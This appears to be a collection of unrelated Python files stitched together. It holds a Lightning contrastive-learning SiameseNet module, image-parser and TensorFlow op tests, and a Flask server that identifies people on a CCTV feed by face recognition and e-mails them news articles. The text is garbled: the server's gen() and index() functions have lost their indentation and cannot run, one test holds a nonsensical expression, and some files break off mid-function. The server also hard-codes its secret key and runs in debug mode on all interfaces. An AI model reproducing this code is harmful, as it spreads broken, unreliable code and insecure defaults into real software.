        # Presumably only the 40 most expensive entries are surfaced — the
        # assertions below encode that cutoff.
        for i in range(1, 41):
            name = 'foo%d' % i
            self.assertTrue(name in c.ExpensiveStuff.Stats if False else name in cata.ExpensiveStuff.Stats)
            self.assertTrue(name in cata.ExpensiveStuff.Notifications)
        for i in range(41, 100):
            name = 'foo%d' % i
            self.assertFalse(name in cata.ExpensiveStuff.Stats)
            self.assertFalse(name in cata.ExpensiveStuff.Notifications)


if __name__ == '__main__':
    unittest.main()
|
"""Adapted from MoCo implementation of PytorchLightning/lightning-bolts"""
from typing import Union, List, Tuple
import torch
from torch import nn
from torch.nn import functional as F
import pytorch_lightning as pl
from pl_bolts.metrics import mean, precision_at_k
# from torchmetrics import IoU
from .resnet import BasicBlock, Bottleneck
from .deeplab import ASPP
from .metrics.iou import IoU
from .utils.scheduler import WarmupConstantSchedule
class SiameseNet(pl.LightningModule):
    """Siamese classification network with stage-wise contrastive learning.

    A query encoder produces class predictions and intermediate features; a
    key encoder — initialised as a parameter copy of the query encoder and
    excluded from gradient updates — provides the matching key features used
    by ``contrastive_loss`` at the configured ResNet stages.
    """

    def __init__(
        self,
        base_encoder: Union[str, torch.nn.Module] = "resnet101",
        num_classes: int = 12,
        emb_dim: int = 128,
        emb_depth: int = 1,
        fc_dim: int = 512,
        num_patches: int = 1,
        learning_rate: float = 0.1,
        momentum: float = 0.9,
        weight_decay: float = 5e-4,
        batch_size: int = 32,
        stages: Union[List, Tuple] = (3, 4),
        siamese: bool = True,
        flip_on_validation: bool = False,
        apool: bool = True,
        warmup_iters: int = 1,
        contrastive_loss=None,
        *args,
        **kwargs,
    ):
        """
        Args:
            base_encoder: base network which consists siamese network
            num_classes: # of classes
            emb_dim: projector dimension which will be used for calculating contrastive loss
            emb_depth: projector depth
            fc_dim: hidden width of the replacement classification head
            num_patches: per-axis patch count used by chunk_feature
            learning_rate: the learning rate
            momentum: optimizer momentum
            weight_decay: optimizer weight decay
            batch_size: batch size
            stages: base encoder (resnet) stages to calculate contrastive loss
            siamese: whether or not to use contrastive loss
            flip_on_validation: on validation, use the mean classification result of two flipped image
            apool: use attentional pooling instead of GAP
            warmup_iters: warmup steps for the LR schedule
            contrastive_loss: contrastive loss function to use
        """
        super().__init__()
        self.save_hyperparameters(ignore="contrastive_loss")
        self.contrastive_loss = contrastive_loss
        # Fix: dropped the pointless f-string prefix on a placeholder-free message.
        assert (
            not self.hparams.siamese or self.contrastive_loss is not None
        ), "Contrastive loss must be specified when using siamese network"

        # create encoders
        self.encoder_q, self.encoder_k = self._init_encoders(self.hparams.base_encoder)
        self._override_classifier()
        self._attach_projector()

    def _override_classifier(self):
        # hack: brute-force replacement
        # Note: this method assumes that base encoder IS Pytorch ResNet (OR it has 'fc' layer)
        # if you want to use other encoder, you must override this method
        classifier_layer = self.encoder_q.fc
        dim_fc = classifier_layer.weight.shape[1]
        dim_head = self.hparams.fc_dim
        self.encoder_q.fc = nn.Sequential(
            nn.Linear(dim_fc, dim_head),
            nn.ReLU(),
            nn.Linear(dim_head, self.hparams.num_classes),
        )
        self.encoder_k.fc = nn.Sequential(
            nn.Linear(dim_fc, dim_head),
            nn.ReLU(),
            nn.Linear(dim_head, self.hparams.num_classes),
        )

    def _attach_projector(self):
        # add mlp layer (projector) per configured stage for contrastive loss
        mlp_q = {}
        mlp_k = {}
        for stage in self.hparams.stages:
            block = getattr(self.encoder_q, f"layer{stage}")[-1]
            if isinstance(block, Bottleneck):
                dim_mlp = block.conv3.weight.shape[0]
            elif isinstance(block, BasicBlock):
                dim_mlp = block.conv2.weight.shape[0]
            else:
                raise NotImplementedError(f"{type(block)} not supported.")
            emb_q = []
            emb_k = []
            for _ in range(self.hparams.emb_depth):
                emb_q.append(nn.Linear(dim_mlp, dim_mlp))
                emb_q.append(nn.ReLU())
                emb_k.append(nn.Linear(dim_mlp, dim_mlp))
                emb_k.append(nn.ReLU())
            emb_q.append(nn.Linear(dim_mlp, self.hparams.emb_dim))
            emb_k.append(nn.Linear(dim_mlp, self.hparams.emb_dim))
            mlp_q[f"mlp_{stage}"] = nn.Sequential(*emb_q)
            mlp_k[f"mlp_{stage}"] = nn.Sequential(*emb_k)
        self.encoder_q.mlp = nn.ModuleDict(mlp_q)
        self.encoder_k.mlp = nn.ModuleDict(mlp_k)
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        # Copy all query-encoder parameters into the key encoder and freeze it.
        for param_q, param_k in zip(
            self.encoder_q.parameters(), self.encoder_k.parameters()
        ):
            param_k.data.copy_(param_q.data)  # initialize
            param_k.requires_grad = False  # not update by gradient

    def _init_encoders(self, base_encoder):
        # assumes base_encoder is a constructor callable accepting
        # pretrained= (the "resnet101" string default would fail here) — TODO confirm
        encoder_q = base_encoder(pretrained=True)
        encoder_k = base_encoder(pretrained=True)
        return encoder_q, encoder_k

    @torch.no_grad()
    def _batch_shuffle_ddp(self, x):  # pragma: no cover
        """
        Batch shuffle, for making use of BatchNorm.
        *** Only support DistributedDataParallel (DDP) model. ***
        """
        # gather from all gpus
        batch_size_this = x.shape[0]
        x_gather = concat_all_gather(x)
        batch_size_all = x_gather.shape[0]
        num_gpus = batch_size_all // batch_size_this
        # random shuffle index
        idx_shuffle = torch.randperm(batch_size_all).cuda()
        # broadcast to all gpus
        torch.distributed.broadcast(idx_shuffle, src=0)
        # index for restoring
        idx_unshuffle = torch.argsort(idx_shuffle)
        # shuffled index for this gpu
        gpu_idx = torch.distributed.get_rank()
        idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]
        return x_gather[idx_this], idx_unshuffle

    @torch.no_grad()
    def _batch_unshuffle_ddp(self, x, idx_unshuffle):  # pragma: no cover
        """
        Undo batch shuffle.
        *** Only support DistributedDataParallel (DDP) model. ***
        """
        # gather from all gpus
        batch_size_this = x.shape[0]
        x_gather = concat_all_gather(x)
        batch_size_all = x_gather.shape[0]
        num_gpus = batch_size_all // batch_size_this
        # restored index for this gpu
        gpu_idx = torch.distributed.get_rank()
        idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]
        return x_gather[idx_this]

    def forward(self, img_q, img_k):
        """Return (class logits for img_q, per-stage {q, k, stage} features)."""
        y_pred, features_q = self.encoder_q(img_q)
        self.contrastive_loss.on_forward(
            encoder_q=self.encoder_q,
            encoder_k=self.encoder_k,
        )
        features = []
        # compute key features
        with torch.no_grad():  # no gradient to keys
            # shuffle for making use of BN
            # When chunking is enabled, shuffle doesn't work
            # if self.trainer.use_ddp or self.trainer.use_ddp2:
            #     img_k, idx_unshuffle = self._batch_shuffle_ddp(img_k)
            _, features_k = self.encoder_k(img_k)
            if self.hparams.apool:
                _, features_k_on_q = self.encoder_q(img_k)
        for stage in self.hparams.stages:
            features_q[stage] = self.chunk_feature(
                features_q[stage], self.hparams.num_patches
            )
            if self.hparams.apool:
                q = self.adaptive_pool(features_q[stage], features_q[stage])
            else:
                q = self.avgpool(features_q[stage])
            q = torch.flatten(q, 1)
            q = self.encoder_q.mlp[f"mlp_{stage}"](q)
            q = nn.functional.normalize(q, dim=1)
            with torch.no_grad():
                features_k[stage] = self.chunk_feature(
                    features_k[stage], self.hparams.num_patches
                )
                if self.hparams.apool:
                    # Fix: features_k_on_q only exists when apool is enabled;
                    # previously it was chunked unconditionally, raising
                    # NameError whenever apool=False.
                    features_k_on_q[stage] = self.chunk_feature(
                        features_k_on_q[stage], self.hparams.num_patches
                    )
                    k = self.adaptive_pool(features_k[stage], features_k_on_q[stage])
                else:
                    k = self.avgpool(features_k[stage])
                # undo shuffle
                # When chunking is enabled, shuffle doesn't work
                # if self.trainer.use_ddp or self.trainer.use_ddp2:
                #     k = self._batch_unshuffle_ddp(k, idx_unshuffle)
                k = torch.flatten(k, 1)
                k = self.encoder_k.mlp[f"mlp_{stage}"](k)
                k = nn.functional.normalize(k, dim=1)
            features.append(
                {
                    "q": q,
                    "k": k,
                    "stage": stage,
                }
            )
        return y_pred, features

    def training_step(self, batch, batch_idx):
        """Joint cross-entropy + (optional) multi-stage contrastive loss."""
        # Freeze batchnorm layers
        self.apply(set_bn_eval)
        (img_1, img_2), labels = batch
        y_pred, features = self(img_q=img_1, img_k=img_2)
        loss_class = F.cross_entropy(y_pred, labels.long())
        loss_contrastive = 0.0
        if self.hparams.siamese:
            loss_contrastive = sum(
                self.contrastive_loss(f["q"], f["k"], stage=f["stage"])
                for f in features
            )
        acc1, acc5 = precision_at_k(y_pred, labels, top_k=(1, 5))
        loss = loss_class + loss_contrastive
        log = {
            "train_loss": loss,
            "train_loss_class": loss_class,
            "train_loss_contrastive": loss_contrastive,
            "train_acc1": acc1,
            "train_acc5": acc5,
        }
        self.log_dict(log, sync_dist=True)
        return loss

    def validation_step(self, batch, batch_idx):
        """Classification loss/accuracy; optionally averages flipped logits."""
        img, labels = batch
        y_pred, _ = self.encoder_q(img)
        if self.hparams.flip_on_validation:
            y_pred_flip, _ = self.encoder_q(torch.flip(img, dims=(3,)))
            y_pred = (y_pred + y_pred_flip) / 2
        loss = F.cross_entropy(y_pred, labels.long())
        acc1, acc5 = precision_at_k(y_pred, labels, top_k=(1, 5))
        results = {"val_loss": loss, "val_acc1": acc1, "val_acc5": acc5}
        return results

    def validation_epoch_end(self, results):
        """Aggregate and log epoch-level validation metrics."""
        val_loss = mean(results, "val_loss")
        val_acc1 = mean(results, "val_acc1")
        val_acc5 = mean(results, "val_acc5")
        log = {"val_loss": val_loss, "val_acc1": val_acc1, "val_acc5": val_acc5}
        self.log_dict(log, sync_dist=True)
        try:
            # LightningModule.print() has an issue on printing when validation mode
            self.print(
                f"[Epoch {self.current_epoch}]: [Val loss: {val_loss:.3f} / Val acc1: {val_acc1:.3f} / Val acc5: {val_acc5:.3f}]"
            )
        except Exception:  # Fix: bare except also swallowed SystemExit/KeyboardInterrupt
            pass

    def adaptive_pool(self, features, attention_base):
        """Attention-weighted spatial sum of `features`.

        The attention map is the (normalised) channel-dot-product between
        `attention_base` and its own global average, so spatial positions
        resembling the global descriptor are weighted up.
        """
        assert features.shape == attention_base.shape
        batch_size = features.shape[0]
        gap = torch.flatten(self.avgpool(attention_base), start_dim=1)
        attention = torch.einsum("nchw,nc->nhw", [attention_base, gap])
        attention /= torch.einsum("nhw->n", [attention]).view(batch_size, 1, 1)
        features_with_attention = torch.einsum("nchw,nhw->nchw", [features, attention])
        return torch.einsum("nchw->nc", [features_with_attention])

    def chunk_feature(self, feature, num_chunks):
        """Split the spatial grid into num_chunks x num_chunks patches,
        stacked along the batch dimension. Identity when num_chunks == 1."""
        if num_chunks == 1:
            return feature
        chunks = torch.chunk(feature, num_chunks, dim=2)
        chunks = [torch.chunk(c, num_chunks, dim=3) for c in chunks]
        chunked_feature = []
        for c in chunks:
            chunked_feature += c
        return torch.cat(chunked_feature, dim=0)

    def configure_optimizers(self):
        """SGD with momentum plus a per-step warmup-then-constant schedule."""
        optimizer = torch.optim.SGD(
            self.parameters(),
            self.hparams.learning_rate,
            momentum=self.hparams.momentum,
            weight_decay=self.hparams.weight_decay,
        )
        scheduler = WarmupConstantSchedule(
            optimizer=optimizer,
            warmup_steps=self.hparams.warmup_iters,
        )
        return {
            "optimizer": optimizer,
            "lr_scheduler": {
                "scheduler": scheduler,
                "interval": "step",
            },
        }
class SiameseNetSegmentation(SiameseNet):
    """SiameseNet variant whose classifier is a DeepLab ASPP segmentation head,
    evaluated with mean IoU instead of top-k accuracy."""

    def __init__(
        self,
        base_encoder,
        num_classes=12,
        emb_dim=128,
        emb_depth=1,
        fc_dim=512,
        num_patches=8,
        learning_rate=0.1,
        momentum=0.9,
        weight_decay=5e-4,
        batch_size=32,
        stages=(3, 4),
        siamese=True,
        flip_on_validation=False,
        apool=True,
        warmup_iters=500,
        contrastive_loss=None,
        *args,
        **kwargs,
    ):
        super().__init__(
            base_encoder=base_encoder,
            num_classes=num_classes,
            emb_dim=emb_dim,
            emb_depth=emb_depth,
            learning_rate=learning_rate,
            momentum=momentum,
            weight_decay=weight_decay,
            batch_size=batch_size,
            stages=stages,
            siamese=siamese,
            flip_on_validation=flip_on_validation,
            fc_dim=fc_dim,
            num_patches=num_patches,
            apool=apool,
            # Fix: previously hard-coded to 500, silently ignoring the
            # constructor's warmup_iters argument.
            warmup_iters=warmup_iters,
            contrastive_loss=contrastive_loss,
            *args,
            **kwargs,
        )
        self.iou = IoU(num_classes=self.hparams.num_classes)
        # 255 is treated as the "ignore" label in the segmentation masks.
        self.criterion = nn.CrossEntropyLoss(ignore_index=255, reduction="mean")

    def _override_classifier(self):
        # Replace the classification head with an ASPP decoder on both encoders.
        # assumes the backbone's final stage emits 2048 channels (ResNet-50/101
        # style Bottleneck) — TODO confirm
        self.encoder_q.aspp = ASPP(2048, self.hparams.num_classes, [6, 12, 18, 24])
        self.encoder_k.aspp = ASPP(2048, self.hparams.num_classes, [6, 12, 18, 24])

    def training_step(self, batch, batch_idx):
        """Pixel-wise CE + (optional) multi-stage contrastive loss."""
        self.apply(set_bn_eval)  # keep BN statistics frozen during training
        (img_1, img_2), labels = batch
        y_pred, features = self(img_q=img_1, img_k=img_2)
        loss_class = self.criterion(y_pred, labels.long())
        loss_contrastive = 0.0
        if self.hparams.siamese:
            loss_contrastive = sum(
                self.contrastive_loss(f["q"], f["k"], stage=f["stage"])
                for f in features
            )
        loss = loss_class + loss_contrastive
        log = {
            "train_loss": loss,
            "train_loss_class": loss_class,
            "train_loss_contrastive": loss_contrastive,
        }
        self.log_dict(log, sync_dist=True)
        return loss

    def validation_step(self, batch, batch_idx):
        """Accumulate IoU and return the pixel-wise CE loss for this batch."""
        img, labels = batch
        y_pred, _ = self.encoder_q(img)
        loss = self.criterion(y_pred, labels.long())
        self.iou(y_pred.argmax(dim=1), labels.long())
        results = {"val_loss": loss}
        return results

    def validation_epoch_end(self, results):
        """Log epoch-level loss and mIoU, then reset the IoU accumulator."""
        val_loss = mean(results, "val_loss")
        val_iou = self.iou.compute()
        self.iou.reset()
        log = {"val_loss": val_loss, "val_iou": val_iou}
        self.log_dict(log, sync_dist=True)
        try:
            # LightningModule.print() has an issue on printing when validation mode
            self.print(
                f"[Epoch {self.current_epoch}]: [Val loss: {val_loss:.3f} / Val mIoU: {val_iou:.3f}]"
            )
        except Exception:  # Fix: bare except also swallowed SystemExit/KeyboardInterrupt
            pass
@torch.no_grad()
def concat_all_gather(tensor):
    """
    Gather `tensor` from every rank and concatenate along dim 0.
    *** Warning ***: torch.distributed.all_gather has no gradient.
    """
    world_size = torch.distributed.get_world_size()
    gathered = [torch.ones_like(tensor) for _ in range(world_size)]
    torch.distributed.all_gather(gathered, tensor, async_op=False)
    return torch.cat(gathered, dim=0)
def set_bn_eval(module):
    """Switch BatchNorm2d/GroupNorm modules to eval mode (freezes BN stats)."""
    if not isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):
        return
    module.eval()
|
<reponame>antmicro/raviewer<filename>tests/grayscale_test.py
from raviewer.parser.grayscale import ParserGrayscale
import unittest
import numpy
from unittest.mock import (Mock, patch)
from enum import Enum
class DummyPixelFormat(Enum):
    """Stand-in for raviewer's PixelFormat enum."""
    MONO = 1


class DummyEndianness(Enum):
    """Stand-in for raviewer's Endianness enum."""
    LITTLE_ENDIAN = 1
    BIG_ENDIAN = 2


class DummyPixelPlane(Enum):
    """Stand-in for raviewer's PixelPlane enum."""
    PACKED = 1
class TestGrayscaleParserClass(unittest.TestCase):
    """Checks ParserGrayscale.parse and get_displayable on 8/12-bit mono data."""

    def setUp(self):
        # Two raw bytes shared by both fixture images.
        self.raw_data = bytes((0, 255))

        # 8-bit packed mono format stub.
        self.GRAY_FORMAT = Mock(pixel_format=DummyPixelFormat.MONO,
                                endianness=DummyEndianness.BIG_ENDIAN,
                                pixel_plane=DummyPixelPlane.PACKED)
        self.GRAY_FORMAT.bits_per_components = (8, 0, 0, 0)

        # 12-bit packed mono format stub.
        self.GRAY12_FORMAT = Mock(pixel_format=DummyPixelFormat.MONO,
                                  endianness=DummyEndianness.BIG_ENDIAN,
                                  pixel_plane=DummyPixelPlane.PACKED)
        self.GRAY12_FORMAT.bits_per_components = (12, 0, 0, 0)

        # 2x1 8-bit image holding pixels 0 and 255.
        self.GRAY_IMAGE = Mock(color_format=self.GRAY_FORMAT,
                               width=2,
                               height=1)
        self.GRAY_IMAGE.processed_data = numpy.array([0, 255])
        self.GRAY_IMAGE.data_buffer = self.raw_data

        # 1x1 12-bit image built from the same two-byte buffer.
        self.GRAY12_IMAGE = Mock(color_format=self.GRAY12_FORMAT,
                                 width=1,
                                 height=1)
        self.GRAY12_IMAGE.processed_data = numpy.array([255])
        self.GRAY12_IMAGE.data_buffer = self.raw_data

        self.parser = ParserGrayscale()

    @patch("raviewer.parser.common.Endianness", DummyEndianness)
    def test_parse(self):
        # Exercise both bit depths against their expected fixture images.
        for fmt, width, expected in (
                (self.GRAY_FORMAT, 2, self.GRAY_IMAGE),
                (self.GRAY12_FORMAT, 1, self.GRAY12_IMAGE),
        ):
            parsed = self.parser.parse(self.raw_data, fmt, width)
            self.assertEqual(parsed.data_buffer, expected.data_buffer)
            self.assertEqual(parsed.width, expected.width)
            self.assertEqual(parsed.height, expected.height)
            self.assertEqual(parsed.color_format, expected.color_format)
            self.assertTrue(
                (parsed.processed_data == expected.processed_data).all())

    def test_get_displayable(self):
        displayable = self.parser.get_displayable(self.GRAY_IMAGE)
        self.assertEqual(displayable.shape,
                         (self.GRAY_IMAGE.height, self.GRAY_IMAGE.width, 3))
        self.assertTrue(
            (displayable == numpy.array([[[0, 0, 0], [255, 255, 255]]])).all())

        displayable = self.parser.get_displayable(self.GRAY12_IMAGE)
        self.assertEqual(
            displayable.shape,
            (self.GRAY12_IMAGE.height, self.GRAY12_IMAGE.width, 3))
        self.assertTrue((displayable == numpy.array([[[15, 15, 15]]])).all())
|
from flask import Flask, render_template, Response, redirect, request, session
import cv2
import time
import requests
from flask_socketio import SocketIO, emit
import os
import threading
import tts_stt
import base64
import numpy as np
import glob
import argparse
import dlib
import os
from utils.aux_functions import *
import math
from RetinaFace.retinaface_cov import RetinaFaceCoV
from PIL import Image, ImageFile
import tensorflow as tf
from parameters import *
import keras
from numpy import load
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import Normalizer
from sklearn.svm import SVC
import pickle
from numpy import dot
from numpy.linalg import norm
import loadmodel
import re
import sys
import time
import subprocess
import inspect
import requests
from bs4 import BeautifulSoup
import pandas as pd
import datetime
import json
import smtplib
from email.mime.text import MIMEText
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
## function define ##
def send_mail(text):
    """E-mail the collected articles in `text` to text['email'] via Gmail SMTP.

    `text` carries parallel 'title' and 'content' lists plus the recipient
    address under 'email'.

    Fixes:
    - The sender address/password were left as bare ``my_email =`` with only
      a comment after ``=`` — a SyntaxError that made the whole module
      unimportable. They are now read from the environment.
    - The SMTP connection is closed in a ``finally`` block so failures no
      longer leak the connection.
    """
    my_email = os.environ.get('MY_EMAIL')
    my_email_pw = os.environ.get('MY_EMAIL_PW')
    your_email = text['email']

    # Build the plain-text body: one titled section per article.
    results = ""
    for i in range(len(text['title'])):
        results += '\n'
        results += '제목 : ' + text['title'][i] + '\n'
        results += '-' * (3 * len(text['title'][i]) + 5) + '\n'
        results += '내용 : ' + text['content'][i] + '\n'
        results += '\n'
        results += '\n'

    message = MIMEText(results)
    message['Subject'] = str(datetime.datetime.now()) + '_기사 모음'
    message['From'] = my_email
    message['To'] = your_email

    smtp = smtplib.SMTP('smtp.gmail.com', 587)
    try:
        smtp.ehlo()
        smtp.starttls()
        smtp.login(my_email, my_email_pw)
        smtp.sendmail(my_email, your_email, message.as_string())
    finally:
        smtp.quit()
def img_to_encoding2(image, model, path=True):
    """Return the embedding `model` produces for a single image.

    NOTE(review): the `path` flag is accepted for call-site compatibility
    but is unused in this implementation.
    """
    preprocessed = tf.keras.applications.inception_resnet_v2.preprocess_input(image)
    batch = np.array([preprocessed])
    return model.predict_on_batch(batch)
def cos_sim(A, B):
    """Cosine similarity between vectors A and B (dot product over norms)."""
    denominator = norm(A) * norm(B)
    return dot(A, B) / denominator
## function define ##
# Announce startup before the (slow) model loading in gen() kicks in.
print('Ready to Starting POSVATOR SERVER......')
app = Flask(__name__)
# NOTE(review): secret key is hard-coded in source; move to env/config.
app.config['SECRET_KEY'] = 'poscointernational'
socketio = SocketIO(app)
# Lazily initialised by the streaming generator: background-thread handle
# plus face-detection/recognition state shared across requests.
thread = None
detector = None
model = None
known_face_encodings = None
known_face_names = None
def gen():
global detector, model, known_face_encodings, known_face_names
"""Video streaming generator function."""
detector, model = loadmodel.load_models()
## extract embeddings from databases ##
thresh = 0.8
mask_thresh = 0.2
known_face_encodings = dict()
users = dict()
files = glob.glob('./users/*.jpg')
total_news = dict()
news = dict()
tfidf = TfidfVectorizer()
korname2engname = dict()
for file in files:
sep = file.split('/')[2]
r_sep = sep.split('_')
if r_sep[1] == 'augmentation':
pass
else:
total_news[r_sep[3]] = { 'title' : [] , 'contents' : [], 'summary' : [] }
known_face_encodings[r_sep[0]] = []
korname2engname[r_sep[3]] = r_sep[0]
print(known_face_encodings)
print(korname2engname)
crawled_news = pd.read_csv('reco2.csv')
for i in range(len(crawled_news)):
user = crawled_news.iloc[i]['user']
title = crawled_news.iloc[i]['title']
content = crawled_news.iloc[i]['contents']
summary = crawled_news.iloc[i]['summary']
total_news[user]['title'].append(title)
total_news[user]['contents'].append(content)
total_news[user]['summary'].append(summary)
for file in files:
scales = [640, 1080]
img = cv2.imread(file)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, (640, 480), interpolation=cv2.INTER_CUBIC)
im_shape = img.shape
target_size = scales[0]
max_size = scales[1]
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
im_scale = float(target_size) / float(im_size_min)
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
scales = [im_scale]
flip = False
faces, landmarks = detector.detect(img, thresh, scales=scales, do_flip=flip)
if len(faces) != 0:
box = faces[0][0:4].astype(np.int)
cv2.rectangle(img, (box[0], box[1]), (box[2], box[3]), (0,0,255), 2)
croped_img = img[box[1]:box[3], box[0]:box[2]]
croped_img = cv2.resize(croped_img, (160, 160), cv2.INTER_CUBIC)
lab = cv2.cvtColor(croped_img, cv2.COLOR_BGR2LAB)
lab_planes = cv2.split(lab)
clahe = cv2.createCLAHE(clipLimit=2.0,tileGridSize=(8 ,8))
lab_planes[0] = clahe.apply(lab_planes[0])
lab = cv2.merge(lab_planes)
croped_img = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
emb = img_to_encoding2(croped_img, model)[0]
emb = emb.reshape(-1)
infos = file.split('/')[2]
info = infos.split('_')
if info[1] == 'augmentation':
known_face_encodings[korname2engname[info[0]]].append(emb)
continue
else:
known_face_encodings[info[0]].append(emb)
# floor, company, count, real_name, email
users[info[0]] = [info[1], info[2], 0, info[3], info[4][:-4]]
cctv_url = 'http://posproject201013.iptime.org:8787/video_feed'
video = cv2.VideoCapture(cctv_url)
mask_count = 0
mask_count_thresh = 15
while True:
try:
scales = [640, 1080]
_, img = video.read()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
im_shape = img.shape
target_size = scales[0]
max_size = scales[1]
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
#im_scale = 1.0
#if im_size_min>target_size or im_size_max>max_size:
im_scale = float(target_size) / float(im_size_min)
# prevent bigger axis from being more than max_size:
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
scales = [im_scale]
flip = False
faces, landmarks = detector.detect(img, thresh, scales=scales, do_flip=flip)
if faces is None:
continue
if len(faces) != 0:
for i in range(faces.shape[0]):
face = faces[i]
box = face[0:4].astype(np.int)
mask = face[5]
name = "Unknown"
if mask>=mask_thresh:
name = 'Mask Detected. Please take off your mask.'
### R G B
color = (0,0,255)
else:
color = (0,255,0)
croped_img = img[box[1]:box[3], box[0]:box[2]]
croped_img = cv2.resize(croped_img, (160, 160), cv2.INTER_CUBIC)
lab = cv2.cvtColor(croped_img, cv2.COLOR_BGR2LAB)
lab_planes = cv2.split(lab)
clahe = cv2.createCLAHE(clipLimit=2.0,tileGridSize=(8 ,8))
lab_planes[0] = clahe.apply(lab_planes[0])
lab = cv2.merge(lab_planes)
croped_img = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
emb = img_to_encoding2(croped_img, model)[0]
emb = emb.reshape(-1)
sim = 0.5
idx = 0
for names in known_face_encodings.keys():
for user_emb in known_face_encodings[names]:
cur_sim = cos_sim(user_emb, emb)
if sim < cur_sim:
sim = cur_sim
name = names
if sim < 0.80:
name = 'Unknown'
cv2.rectangle(img, (box[0], box[1]), (box[2], box[3]), color, 2)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(img, name, (box[0] + 6, box[1] - 6), font, 1.0, (255, 255, 255), 1)
if name != 'Mask Detected. Please take off your mask.' and name != 'Unknown':
print(name, 'detected !!!')
users[name][2] += 1
if users[name][2] >= 15:
print('데이터전송')
socketio.emit('message', {'name': users[name][3], 'floor' : users[name][0], 'company': users[name][1], 'title':total_news[users[name][3]]['title'], 'content':total_news[users[name][3]]['summary'],'send':total_news[users[name][3]]['contents'], 'email' : users[name][4]})
users[name][2] = 0
else:
if name == 'Mask Detected. Please take off your mask.':
mask_count += 1
if mask_count >= mask_count_thresh:
mask_count_thresh += mask_count * 2
mask_count = 0
print('음성 재생 필요!')
requests.get(url = 'http://posproject201013.iptime.org:8787/take_mask')
print('no one detected.')
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
ret, jpeg = cv2.imencode('.jpg', img)
# print("after get_frame")
if img is not None:
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + jpeg.tobytes() + b'\r\n')
except Exception as e:
print('error occured', e)
time.sleep(0.01)
@socketio.on('email')
def handle_my_custom_event(json):
    """Relay an incoming 'email' Socket.IO event payload to the mailer."""
    payload = json
    print('received json: {0}'.format(payload))
    send_mail(payload)
@app.route('/video_feed')
def video_feed():
    """Video streaming route. Put this in the src attribute of an img tag."""
    frame_stream = gen()
    return Response(frame_stream,
                    mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route("/")
def index():
return render_template("index.html", data=None )
@socketio.on('connect')
def connect():
    """Log each new Socket.IO client connection."""
    print("client connected!")
if __name__ == '__main__':
    # Serve the Flask app through the Socket.IO WSGI wrapper on all
    # interfaces; debug=True enables the reloader, so not for production.
    socketio.run(app, host='0.0.0.0', port=8999, debug=True)
|
<gh_stars>10-100
import os
import sys
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
from tensorflow.python.ops import gradient_checker
sys.path.append('../..')
from cext import primitive_mutex_loss
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
class PrimitiveMutexLossTest(test.TestCase):
    """Forward-value and numeric-gradient checks for the custom
    `primitive_mutex_loss` op from `cext`.

    Inputs per cube: z (3 sizes), q (4 quaternion components), t (3
    translation components), flattened per batch element.
    """

    def _VerifyValuesNew(self, in_z, in_q, in_t, scale, expected):
        """Run the op on (z, q, t) and compare the flattened output to
        `expected` with a tight absolute tolerance."""
        with self.test_session() as sess:
            z = constant_op.constant(in_z)
            q = constant_op.constant(in_q)
            t = constant_op.constant(in_t)
            data_out = primitive_mutex_loss(z, q, t, scale=scale)
            actual = sess.run(data_out)
            self.assertAllClose(expected, actual.flatten(), atol=1e-6)

    def _VerifyGradientsNew(self, in_z, in_q, in_t, scale, n_cube, batch_size):
        """Numerically verify gradients w.r.t. z, q and t via
        tf.python.ops.gradient_checker (theoretical vs numerical Jacobians)."""
        with self.test_session() as sess:
            z = constant_op.constant(in_z, shape=[batch_size, 3*n_cube])
            q = constant_op.constant(in_q, shape=[batch_size, 4*n_cube])
            t = constant_op.constant(in_t, shape=[batch_size, 3*n_cube])
            data_out = primitive_mutex_loss(z, q, t, scale=scale)
            ret = gradient_checker.compute_gradient(
                [z, q, t],
                [[batch_size, 3*n_cube], [batch_size, 4*n_cube], [batch_size, 3*n_cube]],
                data_out,
                [1],
                x_init_value=[np.asfarray(in_z).reshape([batch_size, 3*n_cube]),
                              np.asfarray(in_q).reshape([batch_size, 4*n_cube]),
                              np.asfarray(in_t).reshape([batch_size, 3*n_cube])]
            )
            # print(ret)
            # ret[i] pairs (theoretical, numerical) Jacobians for input i.
            self.assertAllClose(ret[0][0], ret[0][1], atol=5e-4)
            self.assertAllClose(ret[1][0], ret[1][1], atol=5e-4)
            self.assertAllClose(ret[2][0], ret[2][1], atol=5e-4)

    def testForward_degenerate(self):
        # Single cube: no pair to be mutually exclusive with -> zero loss.
        in_z = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
        in_q = [[1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
        scale = 1
        expected = [0.0]
        self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)

    def testForward_0(self):
        # Two identical overlapping cubes, identity rotation.
        in_z = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
        in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
